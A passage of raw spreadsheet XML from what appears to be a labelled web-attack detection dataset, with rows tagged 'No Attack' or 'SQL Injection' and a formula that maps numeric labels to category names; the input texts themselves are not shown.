    <row r="30544" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30544" s="1" t="s">
        <v>30759</v>
      </c>
      <c r="B30544">
        <v>0</v>
      </c>
      <c r="C30544" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30545" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30545" s="1" t="s">
        <v>24204</v>
      </c>
      <c r="B30545">
        <v>0</v>
      </c>
      <c r="C30545" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30546" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30546" s="1" t="s">
        <v>20626</v>
      </c>
      <c r="B30546">
        <v>0</v>
      </c>
      <c r="C30546" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30547" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30547" s="1" t="s">
        <v>30085</v>
      </c>
      <c r="B30547">
        <v>0</v>
      </c>
      <c r="C30547" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30548" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30548" s="1" t="s">
        <v>20430</v>
      </c>
      <c r="B30548">
        <v>0</v>
      </c>
      <c r="C30548" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30549" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30549" s="1" t="s">
        <v>34018</v>
      </c>
      <c r="B30549">
        <v>0</v>
      </c>
      <c r="C30549" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30550" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30550" s="1" t="s">
        <v>33609</v>
      </c>
      <c r="B30550">
        <v>0</v>
      </c>
      <c r="C30550" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30551" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30551" s="1" t="s">
        <v>23172</v>
      </c>
      <c r="B30551">
        <v>0</v>
      </c>
      <c r="C30551" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30552" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30552" s="1" t="s">
        <v>23455</v>
      </c>
      <c r="B30552">
        <v>0</v>
      </c>
      <c r="C30552" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30553" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30553" s="1" t="s">
        <v>32718</v>
      </c>
      <c r="B30553">
        <v>0</v>
      </c>
      <c r="C30553" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30554" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30554" s="1" t="s">
        <v>29971</v>
      </c>
      <c r="B30554">
        <v>0</v>
      </c>
      <c r="C30554" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30555" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30555" s="1" t="s">
        <v>31195</v>
      </c>
      <c r="B30555">
        <v>0</v>
      </c>
      <c r="C30555" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30556" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30556" s="1" t="s">
        <v>29037</v>
      </c>
      <c r="B30556">
        <v>0</v>
      </c>
      <c r="C30556" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30557" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30557" s="1" t="s">
        <v>30824</v>
      </c>
      <c r="B30557">
        <v>0</v>
      </c>
      <c r="C30557" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30558" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30558" s="1" t="s">
        <v>32370</v>
      </c>
      <c r="B30558">
        <v>0</v>
      </c>
      <c r="C30558" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30559" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30559" s="1" t="s">
        <v>23366</v>
      </c>
      <c r="B30559">
        <v>0</v>
      </c>
      <c r="C30559" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30560" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30560" s="1" t="s">
        <v>21852</v>
      </c>
      <c r="B30560">
        <v>0</v>
      </c>
      <c r="C30560" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30561" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30561" s="1" t="s">
        <v>21801</v>
      </c>
      <c r="B30561">
        <v>0</v>
      </c>
      <c r="C30561" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30562" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30562" s="1" t="s">
        <v>21911</v>
      </c>
      <c r="B30562">
        <v>0</v>
      </c>
      <c r="C30562" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30563" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30563" s="1" t="s">
        <v>34173</v>
      </c>
      <c r="B30563">
        <v>0</v>
      </c>
      <c r="C30563" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30564" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30564" s="1" t="s">
        <v>28246</v>
      </c>
      <c r="B30564">
        <v>0</v>
      </c>
      <c r="C30564" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30565" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30565" s="1" t="s">
        <v>32479</v>
      </c>
      <c r="B30565">
        <v>0</v>
      </c>
      <c r="C30565" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30566" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30566" s="1" t="s">
        <v>31728</v>
      </c>
      <c r="B30566">
        <v>0</v>
      </c>
      <c r="C30566" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30567" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30567" s="1" t="s">
        <v>29646</v>
      </c>
      <c r="B30567">
        <v>0</v>
      </c>
      <c r="C30567" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30568" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30568" s="1" t="s">
        <v>30979</v>
      </c>
      <c r="B30568">
        <v>0</v>
      </c>
      <c r="C30568" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30569" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30569" s="1" t="s">
        <v>23343</v>
      </c>
      <c r="B30569">
        <v>0</v>
      </c>
      <c r="C30569" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30570" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30570" s="1" t="s">
        <v>11242</v>
      </c>
      <c r="B30570">
        <v>1</v>
      </c>
      <c r="C30570" s="7" t="str">
        <f t="shared" si="477"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="30571" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30571" s="1" t="s">
        <v>27878</v>
      </c>
      <c r="B30571">
        <v>0</v>
      </c>
      <c r="C30571" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30572" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30572" s="1" t="s">
        <v>35692</v>
      </c>
      <c r="B30572">
        <v>0</v>
      </c>
      <c r="C30572" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30573" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30573" s="1" t="s">
        <v>20949</v>
      </c>
      <c r="B30573">
        <v>0</v>
      </c>
      <c r="C30573" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30574" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30574" s="1" t="s">
        <v>30164</v>
      </c>
      <c r="B30574">
        <v>0</v>
      </c>
      <c r="C30574" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30575" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30575" s="1" t="s">
        <v>30279</v>
      </c>
      <c r="B30575">
        <v>0</v>
      </c>
      <c r="C30575" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30576" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30576" s="1" t="s">
        <v>29791</v>
      </c>
      <c r="B30576">
        <v>0</v>
      </c>
      <c r="C30576" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30577" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30577" s="1" t="s">
        <v>27437</v>
      </c>
      <c r="B30577">
        <v>0</v>
      </c>
      <c r="C30577" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30578" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30578" s="1" t="s">
        <v>29934</v>
      </c>
      <c r="B30578">
        <v>0</v>
      </c>
      <c r="C30578" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30579" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30579" s="1" t="s">
        <v>22894</v>
      </c>
      <c r="B30579">
        <v>0</v>
      </c>
      <c r="C30579" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30580" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30580" s="1" t="s">
        <v>29878</v>
      </c>
      <c r="B30580">
        <v>0</v>
      </c>
      <c r="C30580" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30581" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30581" s="1" t="s">
        <v>33685</v>
      </c>
      <c r="B30581">
        <v>0</v>
      </c>
      <c r="C30581" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30582" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30582" s="1" t="s">
        <v>29401</v>
      </c>
      <c r="B30582">
        <v>0</v>
      </c>
      <c r="C30582" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30583" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30583" s="1" t="s">
        <v>31188</v>
      </c>
      <c r="B30583">
        <v>0</v>
      </c>
      <c r="C30583" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30584" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30584" s="1" t="s">
        <v>34580</v>
      </c>
      <c r="B30584">
        <v>0</v>
      </c>
      <c r="C30584" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30585" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30585" s="1" t="s">
        <v>30190</v>
      </c>
      <c r="B30585">
        <v>0</v>
      </c>
      <c r="C30585" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30586" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30586" s="1" t="s">
        <v>21658</v>
      </c>
      <c r="B30586">
        <v>0</v>
      </c>
      <c r="C30586" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30587" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30587" s="1" t="s">
        <v>37328</v>
      </c>
      <c r="B30587">
        <v>0</v>
      </c>
      <c r="C30587" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30588" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30588" s="1" t="s">
        <v>29855</v>
      </c>
      <c r="B30588">
        <v>0</v>
      </c>
      <c r="C30588" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30589" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30589" s="1" t="s">
        <v>32854</v>
      </c>
      <c r="B30589">
        <v>0</v>
      </c>
      <c r="C30589" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30590" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30590" s="1" t="s">
        <v>24103</v>
      </c>
      <c r="B30590">
        <v>0</v>
      </c>
      <c r="C30590" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30591" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30591" s="1" t="s">
        <v>34160</v>
      </c>
      <c r="B30591">
        <v>0</v>
      </c>
      <c r="C30591" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30592" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30592" s="1" t="s">
        <v>26885</v>
      </c>
      <c r="B30592">
        <v>0</v>
      </c>
      <c r="C30592" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30593" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30593" s="1" t="s">
        <v>31314</v>
      </c>
      <c r="B30593">
        <v>0</v>
      </c>
      <c r="C30593" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30594" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30594" s="1" t="s">
        <v>23026</v>
      </c>
      <c r="B30594">
        <v>0</v>
      </c>
      <c r="C30594" s="7" t="str">
        <f t="shared" si="477"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30595" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30595" s="1" t="s">
        <v>27876</v>
      </c>
      <c r="B30595">
        <v>0</v>
      </c>
      <c r="C30595" s="7" t="str">
        <f t="shared" ref="C30595:C30658" si="478">IF(B30595=0,"No Attack", IF(B30595=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30596" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30596" s="1" t="s">
        <v>28168</v>
      </c>
      <c r="B30596">
        <v>0</v>
      </c>
      <c r="C30596" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30597" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30597" s="1" t="s">
        <v>32841</v>
      </c>
      <c r="B30597">
        <v>0</v>
      </c>
      <c r="C30597" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30598" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30598" s="1" t="s">
        <v>36651</v>
      </c>
      <c r="B30598">
        <v>0</v>
      </c>
      <c r="C30598" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30599" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30599" s="1" t="s">
        <v>30758</v>
      </c>
      <c r="B30599">
        <v>0</v>
      </c>
      <c r="C30599" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30600" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30600" s="1" t="s">
        <v>27191</v>
      </c>
      <c r="B30600">
        <v>0</v>
      </c>
      <c r="C30600" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30601" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30601" s="1" t="s">
        <v>21261</v>
      </c>
      <c r="B30601">
        <v>0</v>
      </c>
      <c r="C30601" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30602" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30602" s="1" t="s">
        <v>35122</v>
      </c>
      <c r="B30602">
        <v>0</v>
      </c>
      <c r="C30602" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30603" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30603" s="1" t="s">
        <v>35977</v>
      </c>
      <c r="B30603">
        <v>0</v>
      </c>
      <c r="C30603" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30604" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30604" s="1" t="s">
        <v>33237</v>
      </c>
      <c r="B30604">
        <v>0</v>
      </c>
      <c r="C30604" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30605" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30605" s="1" t="s">
        <v>30784</v>
      </c>
      <c r="B30605">
        <v>0</v>
      </c>
      <c r="C30605" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30606" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30606" s="1" t="s">
        <v>36263</v>
      </c>
      <c r="B30606">
        <v>0</v>
      </c>
      <c r="C30606" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30607" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30607" s="1" t="s">
        <v>24277</v>
      </c>
      <c r="B30607">
        <v>0</v>
      </c>
      <c r="C30607" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30608" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30608" s="1" t="s">
        <v>36300</v>
      </c>
      <c r="B30608">
        <v>0</v>
      </c>
      <c r="C30608" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30609" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30609" s="1" t="s">
        <v>20554</v>
      </c>
      <c r="B30609">
        <v>0</v>
      </c>
      <c r="C30609" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30610" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30610" s="1" t="s">
        <v>28745</v>
      </c>
      <c r="B30610">
        <v>0</v>
      </c>
      <c r="C30610" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30611" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30611" s="1" t="s">
        <v>35015</v>
      </c>
      <c r="B30611">
        <v>0</v>
      </c>
      <c r="C30611" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30612" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30612" s="1" t="s">
        <v>31205</v>
      </c>
      <c r="B30612">
        <v>0</v>
      </c>
      <c r="C30612" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30613" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30613" s="1" t="s">
        <v>31008</v>
      </c>
      <c r="B30613">
        <v>0</v>
      </c>
      <c r="C30613" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30614" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30614" s="1" t="s">
        <v>31292</v>
      </c>
      <c r="B30614">
        <v>0</v>
      </c>
      <c r="C30614" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30615" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30615" s="1" t="s">
        <v>23345</v>
      </c>
      <c r="B30615">
        <v>0</v>
      </c>
      <c r="C30615" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30616" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30616" s="1" t="s">
        <v>22289</v>
      </c>
      <c r="B30616">
        <v>0</v>
      </c>
      <c r="C30616" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30617" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30617" s="1" t="s">
        <v>33464</v>
      </c>
      <c r="B30617">
        <v>0</v>
      </c>
      <c r="C30617" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30618" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30618" s="1" t="s">
        <v>32823</v>
      </c>
      <c r="B30618">
        <v>0</v>
      </c>
      <c r="C30618" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30619" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30619" s="1" t="s">
        <v>24071</v>
      </c>
      <c r="B30619">
        <v>0</v>
      </c>
      <c r="C30619" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30620" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30620" s="1" t="s">
        <v>36787</v>
      </c>
      <c r="B30620">
        <v>0</v>
      </c>
      <c r="C30620" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30621" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30621" s="1" t="s">
        <v>33198</v>
      </c>
      <c r="B30621">
        <v>0</v>
      </c>
      <c r="C30621" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30622" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30622" s="1" t="s">
        <v>35414</v>
      </c>
      <c r="B30622">
        <v>0</v>
      </c>
      <c r="C30622" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30623" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30623" s="1" t="s">
        <v>30336</v>
      </c>
      <c r="B30623">
        <v>0</v>
      </c>
      <c r="C30623" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30624" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30624" s="1" t="s">
        <v>34333</v>
      </c>
      <c r="B30624">
        <v>0</v>
      </c>
      <c r="C30624" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30625" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30625" s="1" t="s">
        <v>28193</v>
      </c>
      <c r="B30625">
        <v>0</v>
      </c>
      <c r="C30625" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30626" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30626" s="1" t="s">
        <v>30227</v>
      </c>
      <c r="B30626">
        <v>0</v>
      </c>
      <c r="C30626" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30627" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30627" s="1" t="s">
        <v>37046</v>
      </c>
      <c r="B30627">
        <v>0</v>
      </c>
      <c r="C30627" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30628" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30628" s="1" t="s">
        <v>22576</v>
      </c>
      <c r="B30628">
        <v>0</v>
      </c>
      <c r="C30628" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30629" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30629" s="1" t="s">
        <v>20542</v>
      </c>
      <c r="B30629">
        <v>0</v>
      </c>
      <c r="C30629" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30630" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30630" s="1" t="s">
        <v>23955</v>
      </c>
      <c r="B30630">
        <v>0</v>
      </c>
      <c r="C30630" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30631" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30631" s="1" t="s">
        <v>32181</v>
      </c>
      <c r="B30631">
        <v>0</v>
      </c>
      <c r="C30631" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30632" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30632" s="1" t="s">
        <v>21270</v>
      </c>
      <c r="B30632">
        <v>0</v>
      </c>
      <c r="C30632" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30633" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30633" s="1" t="s">
        <v>32201</v>
      </c>
      <c r="B30633">
        <v>0</v>
      </c>
      <c r="C30633" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30634" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30634" s="1" t="s">
        <v>32288</v>
      </c>
      <c r="B30634">
        <v>0</v>
      </c>
      <c r="C30634" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30635" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30635" s="1" t="s">
        <v>23361</v>
      </c>
      <c r="B30635">
        <v>0</v>
      </c>
      <c r="C30635" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30636" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30636" s="1" t="s">
        <v>36871</v>
      </c>
      <c r="B30636">
        <v>0</v>
      </c>
      <c r="C30636" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30637" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30637" s="1" t="s">
        <v>21485</v>
      </c>
      <c r="B30637">
        <v>0</v>
      </c>
      <c r="C30637" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30638" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30638" s="1" t="s">
        <v>32171</v>
      </c>
      <c r="B30638">
        <v>0</v>
      </c>
      <c r="C30638" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30639" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30639" s="1" t="s">
        <v>34439</v>
      </c>
      <c r="B30639">
        <v>0</v>
      </c>
      <c r="C30639" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30640" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30640" s="1" t="s">
        <v>37338</v>
      </c>
      <c r="B30640">
        <v>0</v>
      </c>
      <c r="C30640" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30641" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30641" s="1" t="s">
        <v>31633</v>
      </c>
      <c r="B30641">
        <v>0</v>
      </c>
      <c r="C30641" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30642" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30642" s="1" t="s">
        <v>35229</v>
      </c>
      <c r="B30642">
        <v>0</v>
      </c>
      <c r="C30642" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30643" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30643" s="1" t="s">
        <v>35784</v>
      </c>
      <c r="B30643">
        <v>0</v>
      </c>
      <c r="C30643" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30644" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30644" s="1" t="s">
        <v>33213</v>
      </c>
      <c r="B30644">
        <v>0</v>
      </c>
      <c r="C30644" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30645" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30645" s="1" t="s">
        <v>30930</v>
      </c>
      <c r="B30645">
        <v>0</v>
      </c>
      <c r="C30645" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30646" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30646" s="1" t="s">
        <v>24286</v>
      </c>
      <c r="B30646">
        <v>0</v>
      </c>
      <c r="C30646" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30647" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30647" s="1" t="s">
        <v>34662</v>
      </c>
      <c r="B30647">
        <v>0</v>
      </c>
      <c r="C30647" s="7" t="str">
        <f t="shared" si="478"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="30648" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30648" s="1" t="s">
        <v>30047</v>
      </c>
      <c r="B30648">
